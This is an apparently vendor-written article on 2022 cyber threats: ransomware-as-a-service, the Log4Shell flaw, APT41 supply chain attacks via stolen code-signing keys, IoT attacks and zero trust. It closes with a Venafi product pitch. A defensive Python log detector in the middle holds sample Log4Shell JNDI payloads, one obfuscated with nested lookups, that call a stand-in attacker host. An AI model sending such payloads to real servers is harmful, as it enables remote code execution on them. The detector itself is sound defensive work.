Cybersecurity threats are only increasing as the digital transformation continues. While Log4J is the latest serious vulnerability—prompting the FTC to threaten legal action if organizations don’t act to mitigate the problem—ransomware looms as a persistent risk in 2022 as criminals shift to a Ransomware-as-a-service (RaaS) business model. Other threats on a growth path include software supply chain and IoT attacks.
Colonial Pipeline, Kaseya, and JBS are the stand-out examples of ransomware attacks in 2021, but the threat is now everywhere. Ransomware attacks spiked by 250% from Q1 to Q2 of 2021, Venafi said in its Global Security Report.
“By the end of 2021, it’s estimated that an organization will be hit by ransomware every 11 seconds,” according to a Venafi-sponsored study conducted by Sapio Research, which evaluated data from 1,506 IT security officers across the U.S., U.K., Germany, France, Benelux and Australia.
This is being driven by the Ransomware-as-a-Service (RaaS) economy, as noted by Check Point Software. “In the RaaS economy, the service provided is the infrastructure required to perform a ransomware attack. RaaS operators maintain the ransomware malware, offer a payment portal for victims, and may provide the ‘customer service’ that victims might need (since many ransoms are demanded in Bitcoin or other cryptocurrencies).”
Affiliates are responsible for spreading the ransomware and any ransom paid is split between the operator and the affiliate, according to Check Point.
As in any business, both sides of the model benefit. The operator gains scale and can focus on maintaining the backend infrastructure, while the affiliate gets access to the ransomware and infrastructure and can focus on infiltrating networks and infecting computers, says Check Point.
In 2020 the total amount of ransom paid by cyberattack victims was close to US$416 million. This figure is projected to double in 2021 and double again in 2022. And the total average cost to rectify ransomware attacks is estimated to be US$1.85 million, more than double the US$761,106 cost reported in 2020, according to Sophos.
But there are ways to fight back.
“Controls like code signing, restricting the execution of malicious macros and limiting the use of unsigned scripts based on corporate security policies use a high level of automation to prevent ransomware in our machine-centric, digitally transformed world,” explains Kevin Bocek, vice president ecosystem and threat intelligence at Venafi.
Log4Shell is a zero-day Remote Code Execution (RCE) vulnerability (CVE-2021-44228) in Apache Log4j, a popular logging library for Java applications, first reported to Apache in November of 2021. It allows a remote attacker to execute arbitrary code, as explained by Yana Blachman, Threat Intelligence researcher at Venafi.
“The combination of this library being practically everywhere and the vulnerability being trivial to exploit with many exploits and PoCs [proof of concept] available online—makes it extremely dangerous and highly effective for every type of cybercriminal activity,” Blachman said, adding that the widespread exploitation of the vulnerability means every corporate network is at risk.
Log4J will continue to be a concern for cybersecurity professionals in 2022 as the Federal Trade Commission (FTC) puts pressure on organizations to take action.
Venafi recommends that companies use the Log4Shell scanner [log4shell.huntress.com] to assess whether they are vulnerable, and that they patch the vulnerability as soon as possible rather than wait to become a victim, according to Blachman.
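Scanning for the vulnerable library is one half of the response; the other is checking whether your own web logs already carry exploitation attempts. The following detector is an added example, not code from the article or from Venafi: it flags request lines containing a Log4j JNDI lookup, after first collapsing the nested `${lower:...}`/`${upper:...}` lookups that Log4j resolves before the outer lookup and that would otherwise hide the string from a naive search. The log lines and the `attacker.example.invalid` host are constructed for the example.

```python
import re
from typing import Dict, List

# Constructed sample access-log lines (not from the original article).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 310 "-" "${jndi:ldap://attacker.example.invalid/a}"
203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example.invalid/b}"
198.51.100.7 - - [10/Dec/2021:14:03:01 +0000] "GET /health HTTP/1.1" 200 2 "-" "curl/7.79"
"""

# Log4j evaluates inner lookups such as ${lower:X} / ${upper:X} before the
# outer ${jndi:...} lookup, so the detector normalises them away first.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(text: str) -> str:
    """Collapse nested lower/upper lookups, innermost first, to plain text."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(lambda m: m.group(1), text)
    return text


def find_log4shell_attempts(log_text: str) -> List[Dict[str, object]]:
    """Return one record per log line that carries a JNDI lookup string."""
    hits: List[Dict[str, object]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        if _JNDI.search(normalise(line)):
            hits.append({"line": lineno, "src": line.split()[0], "raw": line})
    return hits


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_LOG):
        print(f"line {hit['line']} from {hit['src']}: {hit['raw']}")
```

A hit means an exploitation attempt reached the server, not that it succeeded; treat it as a prompt to confirm patch status on the affected host and to look for outbound connections from it around that timestamp.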
Supply chain attacks rose sharply over the last 12 months, according to software supply chain management company Sonatype, which cites an increase of 650% in attacks over that period.
Software supply chain attackers tamper with code in the software that vendors supply to their customers. This is becoming popular with criminals because the tampered code reaches end users hidden inside software they already trust, giving attackers a foothold from which to launch further attacks.
APT41, a state-backed Chinese hacking group, is one of the most notorious supply chain attackers. APT41’s most common attack methodology is to penetrate the supply chain via compromised code signing certificates, as Venafi has noted.
This allows “malicious code to appear authentic and evade security controls. The success of attacks using this model over the last decade has created a blueprint for sophisticated attacks that have been highly successful because they are very difficult to detect,” according to Venafi’s Blachman.
One typical APT41 tactic is to compromise the supply chain of a major commercial vendor, which gives them access to an entire pool of companies—which the bad guys can then attack at their leisure, Blachman says. After infecting their chosen targets with secondary malware, APT41 uses stolen credentials to move laterally across their networks, stealing intellectual property, sensitive customer data, and more.
At the heart of this scheme are stolen code signing machine identities, without which gaining unauthorized network access would be impossible.
APT41 is managing a library of stolen or purchased code signing keys and certificates and selling them for up to $1,200 each on the dark web.
Venafi's Kevin Bocek notes that today’s attackers are “disciplined, highly skilled software developers, using the same tools and techniques as the good guys.”
“Few cybersecurity specialists keep track of their corporate IoT [Internet of Things] hardware,” says cybersecurity company Kaspersky. “More often than not, smart elevators, all sorts of sensors, IPTV, printers, surveillance cameras, and the like are just a motley collection of disparate devices, each with its own OS and proprietary protocols, and many lacking any sort of proper control interface … you get the picture. Your company may have thousands of them,” according to Kaspersky.
Throw in all of the new consumer devices such as smartwatches and home appliances and it’s easy to see how these devices are becoming ubiquitous.
Kaspersky, which set up honeypots (decoy systems that lure online attackers), said these honeypots detected over 1.5 billion cyberattacks focused on IoT devices in the first half of 2021, according to a report at TechRepublic.
This will only get worse in 2022. “In 2022 we will undoubtedly continue to see attacks on IoT devices increase. Edge computing devices—where data is operated on as close as possible to the point it is collected—as well as centralized cloud infrastructure are all vulnerable,” according to Forbes.
Data breach costs rose from US$3.86 million to US$4.24 million, “the highest average total cost in the 17-year history of this report,” said IBM in its Cost of a Data Breach Report 2021 (via welivesecurity).
On the upside, the average cost of a breach was US$1.76 million less at organizations with a mature zero trust approach, compared to organizations without zero trust, IBM said.
Zero Trust security is based on the tenet “Never Trust, Always Verify” and requires strict and continuous verification of user and machine identities, as Venafi has described. In a business environment where applications are delivered cloud to cloud, users are located everywhere and use multiple machines to accomplish routine tasks. That means that all interactions, even those originating from employees, are inherently risky and necessitate a different approach to security. Zero Trust is a strategic initiative and principle that helps organizations prevent data breaches and protect their assets by assuming no entity is trusted by default.
Venafi CodeSign Protect is an all-in-one machine identity management solution for your code signing keys and certificates. Insecure private keys, rogue software teams, and lack of policy enforcement can be mitigated as you kickstart your digital transformation. Information is power, and an in-depth understanding of the latest code signing compromise techniques could be what saves your network from a financially devastating cyber-attack. To support IoT and Zero Trust security models, explore the enterprise-wide machine identity management provided by Venafi Trust Protection Platform.